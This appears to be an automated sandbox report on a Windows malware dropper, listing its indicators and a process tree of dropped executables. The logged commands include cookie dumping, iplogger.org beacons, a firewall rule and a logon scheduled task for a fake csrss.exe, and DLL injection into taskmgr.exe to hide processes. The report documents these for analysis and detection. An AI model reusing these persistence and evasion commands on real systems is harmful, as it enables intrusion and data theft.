Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time"	Info.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exepub2.exemsedge.exejfiag3g_gg.exe

pid	process
4444	msedge.exe
4444	msedge.exe
1736	pub2.exe
1736	pub2.exe
3600	msedge.exe
3600	msedge.exe
1608	jfiag3g_gg.exe
1608	jfiag3g_gg.exe
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

1736 pub2.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

msedge.exe

pid process

3600 msedge.exe
3600 msedge.exe
3600 msedge.exe
3600 msedge.exe

pid	process
1736	pub2.exe

pid	process
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe
3600	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

KRSetp.exeInstall.exetaskkill.exemd9_1sjm.exeInfo.exesvchost.exeInfo.exe

description	pid	process
Token: SeDebugPrivilege	3492	KRSetp.exe
Token: SeCreateTokenPrivilege	4764	Install.exe
Token: SeAssignPrimaryTokenPrivilege	4764	Install.exe
Token: SeLockMemoryPrivilege	4764	Install.exe
Token: SeIncreaseQuotaPrivilege	4764	Install.exe
Token: SeMachineAccountPrivilege	4764	Install.exe
Token: SeTcbPrivilege	4764	Install.exe
Token: SeSecurityPrivilege	4764	Install.exe
Token: SeTakeOwnershipPrivilege	4764	Install.exe
Token: SeLoadDriverPrivilege	4764	Install.exe
Token: SeSystemProfilePrivilege	4764	Install.exe
Token: SeSystemtimePrivilege	4764	Install.exe
Token: SeProfSingleProcessPrivilege	4764	Install.exe
Token: SeIncBasePriorityPrivilege	4764	Install.exe
Token: SeCreatePagefilePrivilege	4764	Install.exe
Token: SeCreatePermanentPrivilege	4764	Install.exe
Token: SeBackupPrivilege	4764	Install.exe
Token: SeRestorePrivilege	4764	Install.exe
Token: SeShutdownPrivilege	4764	Install.exe
Token: SeDebugPrivilege	4764	Install.exe
Token: SeAuditPrivilege	4764	Install.exe
Token: SeSystemEnvironmentPrivilege	4764	Install.exe
Token: SeChangeNotifyPrivilege	4764	Install.exe
Token: SeRemoteShutdownPrivilege	4764	Install.exe
Token: SeUndockPrivilege	4764	Install.exe
Token: SeSyncAgentPrivilege	4764	Install.exe
Token: SeEnableDelegationPrivilege	4764	Install.exe
Token: SeManageVolumePrivilege	4764	Install.exe
Token: SeImpersonatePrivilege	4764	Install.exe
Token: SeCreateGlobalPrivilege	4764	Install.exe
Token: 31	4764	Install.exe
Token: 32	4764	Install.exe
Token: 33	4764	Install.exe
Token: 34	4764	Install.exe
Token: 35	4764	Install.exe
Token: SeDebugPrivilege	3884	taskkill.exe
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352
Token: SeManageVolumePrivilege	4072	md9_1sjm.exe
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352
Token: SeDebugPrivilege	5068	Info.exe
Token: SeImpersonatePrivilege	5068	Info.exe
Token: SeTcbPrivilege	3260	svchost.exe
Token: SeTcbPrivilege	3260	svchost.exe
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352
Token: SeSystemEnvironmentPrivilege	3884	Info.exe
Token: SeShutdownPrivilege	2352
Token: SeCreatePagefilePrivilege	2352
Token: SeBackupPrivilege	3260	svchost.exe
Token: SeRestorePrivilege	3260	svchost.exe

Suspicious use of FindShellTrayWindow 23 IoCs

Processes:

mysetold.exemsedge.exe

pid	process
2744	mysetold.exe
2744	mysetold.exe
2744	mysetold.exe
2744	mysetold.exe
2744	mysetold.exe
2744	mysetold.exe
3600	msedge.exe
2744	mysetold.exe
3600	msedge.exe
2744	mysetold.exe
2744	mysetold.exe
2744	mysetold.exe
2744	mysetold.exe
2744	mysetold.exe
2744	mysetold.exe
2744	mysetold.exe
2744	mysetold.exe
2744	mysetold.exe
2744	mysetold.exe
2352
2352
2352
3600	msedge.exe

Suspicious use of SendNotifyMessage 17 IoCs

Processes:

mysetold.exe

pid	process
2744	mysetold.exe
2744	mysetold.exe
2744	mysetold.exe
2744	mysetold.exe
2744	mysetold.exe
2744	mysetold.exe
2744	mysetold.exe
2744	mysetold.exe
2744	mysetold.exe
2744	mysetold.exe
2744	mysetold.exe
2744	mysetold.exe
2744	mysetold.exe
2744	mysetold.exe
2744	mysetold.exe
2744	mysetold.exe
2744	mysetold.exe

Suspicious use of SetWindowsHookEx 20 IoCs

Processes:

Installation.exeComplete.exeeRiPsvQODoTtVRqaYfYBs9Ro.exe_vIlbqtH7cKSHV_aT4iNDb4v.exeMP3vMwyz_y9xfrcalRh04O05.exeAHeldDGWMRASVUJ7xscUErjc.exeJZ2Ul6MAL_ZVIvnh7V5FsASs.exeV2lyN2j8VNViGUyTYAcXM99i.exeA7bwgO7kepN2yOTZdpfx7wZW.exeyDz5CdaJHjhHliz1RANETFJI.exeKGL50.exeG4GC4.exeC8LAA.exeSMuUnQc7IWlJf4RiHIuPC0Pk.exeJ7BEL.exeKGL50.exeB3qEXZPy_N12bXLVx3VwZOMK.exeAfyZYeqkyZgvbXNLdKnZSXkP.exeIL2MJM8MLFKC5C2.exe

pid	process
2836	Installation.exe
2400	Complete.exe
100	eRiPsvQODoTtVRqaYfYBs9Ro.exe
1928	_vIlbqtH7cKSHV_aT4iNDb4v.exe
5200	MP3vMwyz_y9xfrcalRh04O05.exe
2564	AHeldDGWMRASVUJ7xscUErjc.exe
4320	JZ2Ul6MAL_ZVIvnh7V5FsASs.exe
2500	V2lyN2j8VNViGUyTYAcXM99i.exe
5360	A7bwgO7kepN2yOTZdpfx7wZW.exe
5436	yDz5CdaJHjhHliz1RANETFJI.exe
5944	KGL50.exe
5784	G4GC4.exe
5764	C8LAA.exe
5492	SMuUnQc7IWlJf4RiHIuPC0Pk.exe
6124	J7BEL.exe
6052	KGL50.exe
5472	B3qEXZPy_N12bXLVx3VwZOMK.exe
5384	AfyZYeqkyZgvbXNLdKnZSXkP.exe
2320	IL2MJM8MLFKC5C2.exe
2320	IL2MJM8MLFKC5C2.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exeFiles.exemsedge.exeFolder.exeInstall.exe

description	pid	process	target process
PID 3828 wrote to memory of 4044	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	Files.exe
PID 3828 wrote to memory of 4044	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	Files.exe
PID 3828 wrote to memory of 4044	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	Files.exe
PID 3828 wrote to memory of 3492	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	KRSetp.exe
PID 3828 wrote to memory of 3492	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	KRSetp.exe
PID 4044 wrote to memory of 1160	4044	Files.exe	jfiag3g_gg.exe
PID 4044 wrote to memory of 1160	4044	Files.exe	jfiag3g_gg.exe
PID 4044 wrote to memory of 1160	4044	Files.exe	jfiag3g_gg.exe
PID 3828 wrote to memory of 3600	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	msedge.exe
PID 3828 wrote to memory of 3600	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	msedge.exe
PID 3828 wrote to memory of 4764	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	Install.exe
PID 3828 wrote to memory of 4764	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	Install.exe
PID 3828 wrote to memory of 4764	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	Install.exe
PID 3600 wrote to memory of 4724	3600	msedge.exe	msedge.exe
PID 3600 wrote to memory of 4724	3600	msedge.exe	msedge.exe
PID 3828 wrote to memory of 3944	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	Folder.exe
PID 3828 wrote to memory of 3944	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	Folder.exe
PID 3828 wrote to memory of 3944	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	Folder.exe
PID 3828 wrote to memory of 5068	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	Info.exe
PID 3828 wrote to memory of 5068	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	Info.exe
PID 3828 wrote to memory of 5068	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	Info.exe
PID 3828 wrote to memory of 2836	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	Installation.exe
PID 3828 wrote to memory of 2836	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	Installation.exe
PID 3828 wrote to memory of 2836	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	Installation.exe
PID 3944 wrote to memory of 2456	3944	Folder.exe	Folder.exe
PID 3944 wrote to memory of 2456	3944	Folder.exe	Folder.exe
PID 3944 wrote to memory of 2456	3944	Folder.exe	Folder.exe
PID 3828 wrote to memory of 1736	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	pub2.exe
PID 3828 wrote to memory of 1736	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	pub2.exe
PID 3828 wrote to memory of 1736	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	pub2.exe
PID 3828 wrote to memory of 2744	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	mysetold.exe
PID 3828 wrote to memory of 2744	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	mysetold.exe
PID 3828 wrote to memory of 2744	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	mysetold.exe
PID 3828 wrote to memory of 4072	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	md9_1sjm.exe
PID 3828 wrote to memory of 4072	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	md9_1sjm.exe
PID 3828 wrote to memory of 4072	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	md9_1sjm.exe
PID 3828 wrote to memory of 2400	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	Complete.exe
PID 3828 wrote to memory of 2400	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	Complete.exe
PID 3828 wrote to memory of 2400	3828	425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe	Complete.exe
PID 4764 wrote to memory of 2120	4764	Install.exe	cmd.exe
PID 4764 wrote to memory of 2120	4764	Install.exe	cmd.exe
PID 4764 wrote to memory of 2120	4764	Install.exe	cmd.exe
PID 3600 wrote to memory of 4996	3600	msedge.exe	msedge.exe
PID 3600 wrote to memory of 4996	3600	msedge.exe	msedge.exe
PID 3600 wrote to memory of 4996	3600	msedge.exe	msedge.exe
PID 3600 wrote to memory of 4996	3600	msedge.exe	msedge.exe
PID 3600 wrote to memory of 4996	3600	msedge.exe	msedge.exe
PID 3600 wrote to memory of 4996	3600	msedge.exe	msedge.exe
PID 3600 wrote to memory of 4996	3600	msedge.exe	msedge.exe
PID 3600 wrote to memory of 4996	3600	msedge.exe	msedge.exe
PID 3600 wrote to memory of 4996	3600	msedge.exe	msedge.exe
PID 3600 wrote to memory of 4996	3600	msedge.exe	msedge.exe
PID 3600 wrote to memory of 4996	3600	msedge.exe	msedge.exe
PID 3600 wrote to memory of 4996	3600	msedge.exe	msedge.exe
PID 3600 wrote to memory of 4996	3600	msedge.exe	msedge.exe
PID 3600 wrote to memory of 4996	3600	msedge.exe	msedge.exe
PID 3600 wrote to memory of 4996	3600	msedge.exe	msedge.exe
PID 3600 wrote to memory of 4996	3600	msedge.exe	msedge.exe
PID 3600 wrote to memory of 4996	3600	msedge.exe	msedge.exe
PID 3600 wrote to memory of 4996	3600	msedge.exe	msedge.exe
PID 3600 wrote to memory of 4996	3600	msedge.exe	msedge.exe
PID 3600 wrote to memory of 4996	3600	msedge.exe	msedge.exe
PID 3600 wrote to memory of 4996	3600	msedge.exe	msedge.exe
PID 3600 wrote to memory of 4996	3600	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe
"C:\Users\Admin\AppData\Local\Temp\425e1c9e3ba4693b08ae85998d6686425bfc2481eb276354457b090c980928f5.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3828

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4044

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:1160

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1608

C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3492

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij7
2⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3600

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc86b646f8,0x7ffc86b64708,0x7ffc86b64718
3⤵
PID:4724

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,16453766104386387149,11126631469194386203,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
3⤵
PID:4996

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,16453766104386387149,11126631469194386203,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4444

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,16453766104386387149,11126631469194386203,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:8
3⤵
PID:4788

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16453766104386387149,11126631469194386203,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
3⤵
PID:3284

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16453766104386387149,11126631469194386203,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
3⤵
PID:2308

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16453766104386387149,11126631469194386203,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:1
3⤵
PID:532

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16453766104386387149,11126631469194386203,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
3⤵
PID:2588

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,16453766104386387149,11126631469194386203,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6236 /prefetch:2
3⤵
PID:6420

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4764

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
PID:2120

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3884

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3944

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
3⤵
- Executes dropped EXE
PID:2456

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5068

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3884

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
PID:2996

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
PID:4372

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /94-94
4⤵
- Executes dropped EXE
PID:4776

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:2112

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:5572

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:5656

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:5736

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:5744

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:5772

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:5800

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:5996

C:\Users\Admin\AppData\Local\Temp\Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Installation.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:2836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2836 -s 1900
3⤵
- Program crash
PID:5652

C:\Users\Admin\Pictures\Adobe Films\dJnOX0WqjR76U1sMBkkGmAgZ.exe
"C:\Users\Admin\Pictures\Adobe Films\dJnOX0WqjR76U1sMBkkGmAgZ.exe"
3⤵
- Executes dropped EXE
PID:5648

C:\Users\Admin\AppData\Local\Temp\mysetold.exe
"C:\Users\Admin\AppData\Local\Temp\mysetold.exe"
2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2744

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:4072

C:\Users\Admin\AppData\Local\Temp\Complete.exe
"C:\Users\Admin\AppData\Local\Temp\Complete.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:2400

C:\Users\Admin\Documents\eRiPsvQODoTtVRqaYfYBs9Ro.exe
"C:\Users\Admin\Documents\eRiPsvQODoTtVRqaYfYBs9Ro.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 100 -s 464
4⤵
- Program crash
PID:5480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 100 -s 472
4⤵
- Program crash
PID:4012

C:\Users\Admin\Documents\_vIlbqtH7cKSHV_aT4iNDb4v.exe
"C:\Users\Admin\Documents\_vIlbqtH7cKSHV_aT4iNDb4v.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:1928

C:\Users\Admin\Documents\S0ejCs2H7HY5kLj7lafpN2ZH.exe
"C:\Users\Admin\Documents\S0ejCs2H7HY5kLj7lafpN2ZH.exe"
3⤵
- Executes dropped EXE
PID:1312

C:\Users\Admin\Documents\V2lyN2j8VNViGUyTYAcXM99i.exe
"C:\Users\Admin\Documents\V2lyN2j8VNViGUyTYAcXM99i.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:2500

C:\Users\Admin\AppData\Local\Temp\C8LAA.exe
"C:\Users\Admin\AppData\Local\Temp\C8LAA.exe"
4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:5764

C:\Users\Admin\AppData\Local\Temp\G4GC4.exe
"C:\Users\Admin\AppData\Local\Temp\G4GC4.exe"
4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:5784

C:\Users\Admin\AppData\Local\Temp\KGL50.exe
"C:\Users\Admin\AppData\Local\Temp\KGL50.exe"
4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:5944

C:\Users\Admin\AppData\Local\Temp\KGL50.exe
"C:\Users\Admin\AppData\Local\Temp\KGL50.exe"
4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:6052

C:\Users\Admin\AppData\Local\Temp\J7BEL.exe
"C:\Users\Admin\AppData\Local\Temp\J7BEL.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6124

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",
5⤵
PID:5268

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",
6⤵
PID:5728

C:\Users\Admin\AppData\Local\Temp\IL2MJM8MLFKC5C2.exe
https://iplogger.org/1nChi7
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2320

C:\Users\Admin\Documents\AHeldDGWMRASVUJ7xscUErjc.exe
"C:\Users\Admin\Documents\AHeldDGWMRASVUJ7xscUErjc.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2564

C:\Users\Admin\Documents\JZ2Ul6MAL_ZVIvnh7V5FsASs.exe
